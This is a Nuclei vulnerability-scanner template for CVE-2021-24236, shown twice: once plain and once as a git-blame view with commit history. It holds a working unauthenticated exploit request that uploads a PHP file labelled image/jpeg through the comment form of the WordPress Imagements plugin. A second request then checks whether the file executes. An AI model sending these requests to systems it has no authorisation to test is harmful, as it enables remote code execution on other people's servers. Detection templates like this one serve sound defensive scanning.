nuclei-templates/http/cves/2021/CVE-2021-24236.yaml

id: "CVE-2021-24236"

info:
  name: WordPress Imagements <=1.2.5 - Arbitrary File Upload
  author: pussycat0x
  severity: critical
  description: |
    WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.
  remediation: |
    Update WordPress Imagements plugin to version 1.2.6 or later to fix the arbitrary file upload vulnerability.
  reference:
    - https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea
    - https://wordpress.org/plugins/imagements/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24236
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: "CVE-2021-24236"
    cwe-id: CWE-434
    epss-score: 0.14539
    epss-percentile: 0.95203
    cpe: cpe:2.3:a:imagements_project:imagements:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: imagements_project
    product: imagements
    framework: wordpress
  tags: cve,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive,imagements_project
variables:
  php: "{{to_lower('{{randstr}}')}}.php"
  post: "1"

http:
  - raw:
      - |
        POST /wp-comments-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="author"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="email"

        {{randstr}}@email.com
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="url"

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="checkbox"


        yes
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="naam"

        {{randstr}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="image"; filename="{{php}}"
        Content-Type: image/jpeg

        <?php echo 'CVE-2021-24236'; ?>

        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="submit"

        Post Comment
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment_post_ID"

        {{post}}
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
        Content-Disposition: form-data; name="comment_parent"

        0
        ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--
      - |
        GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - "CVE-2021-24236"
# digest: 490a0046304402207ba3412f3561217b9519661572da231f18dce15deba043a3d32af2f35650228402204894ed5f8ede4b4f94b24a29529285977652667defd47e6c6c43317782d3f8d2:922c64590222798bb761d5b6d8e72950
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`id: "CVE-2021-24236"`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00
			`info:`
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements 2022-10-10 19:22:59 +00:00			`name: WordPress Imagements <=1.2.5 - Arbitrary File Upload`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`author: pussycat0x`
			`severity: critical`
			`description: \|`
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements 2022-10-10 19:22:59 +00:00			`WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: \|`
			`Update WordPress Imagements plugin to version 1.2.6 or later to fix the arbitrary file upload vulnerability.`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/8f24e74f-60e3-4100-9ab2-ec31b9c9cdea`
Update CVE-2021-24236.yaml 2022-07-31 04:35:00 +00:00			`- https://wordpress.org/plugins/imagements/`
Update CVE-2021-24236.yaml 2022-07-30 22:42:08 +00:00			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24236`
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements 2022-10-10 19:22:59 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-24236`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`classification:`
Auto Generated CVE annotations [Mon Oct 10 19:40:25 UTC 2022] :robot: 2022-10-10 19:40:25 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`cve-id: "CVE-2021-24236"`
Auto Generated CVE annotations [Mon Oct 10 19:40:25 UTC 2022] :robot: 2022-10-10 19:40:25 +00:00			`cwe-id: CWE-434`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`epss-score: 0.14539`
TemplateMan Update [Mon Nov 27 09:19:41 UTC 2023] :robot: 2023-11-27 09:19:41 +00:00			`epss-percentile: 0.95203`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:imagements_project:imagements::::::wordpress::*`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: imagements_project`
			`product: imagements`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`framework: wordpress`
tags enhancements 2023-12-05 09:50:33 +00:00			`tags: cve,wp,unauth,imagements,wpscan,cve2021,fileupload,wordpress,wp-plugin,intrusive,imagements_project`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`variables:`
			`php: "{{to_lower('{{randstr}}')}}.php"`
			`post: "1"`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`- raw:`
			`- \|`
			`POST /wp-comments-post.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU`

			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="comment"`

			`{{randstr}}`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="author"`

			`{{randstr}}`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="email"`

			`{{randstr}}@email.com`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="url"`

			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="checkbox"`

fix-conflict 2022-10-25 13:40:49 +00:00
Added CVE-2021-24236 Co-Authored-By: pussycat0x <65701233+pussycat0x@users.noreply.github.com> 2022-07-30 10:13:30 +00:00			`yes`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="naam"`

			`{{randstr}}`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="image"; filename="{{php}}"`
			`Content-Type: image/jpeg`

			`<?php echo 'CVE-2021-24236'; ?>`

			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="submit"`

			`Post Comment`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="comment_post_ID"`

			`{{post}}`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU`
			`Content-Disposition: form-data; name="comment_parent"`

			`0`
			`------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--`
			`- \|`
			`GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers:`
			`- type: word`
			`part: body_2`
			`words:`
Update CVE-2021-24236.yaml 2022-07-30 22:42:08 +00:00			`- "CVE-2021-24236"`
Auto Template Signing [Wed Dec 6 05:59:55 UTC 2023] :robot: 2023-12-06 05:59:56 +00:00			`# digest: 490a0046304402207ba3412f3561217b9519661572da231f18dce15deba043a3d32af2f35650228402204894ed5f8ede4b4f94b24a29529285977652667defd47e6c6c43317782d3f8d2:922c64590222798bb761d5b6d8e72950`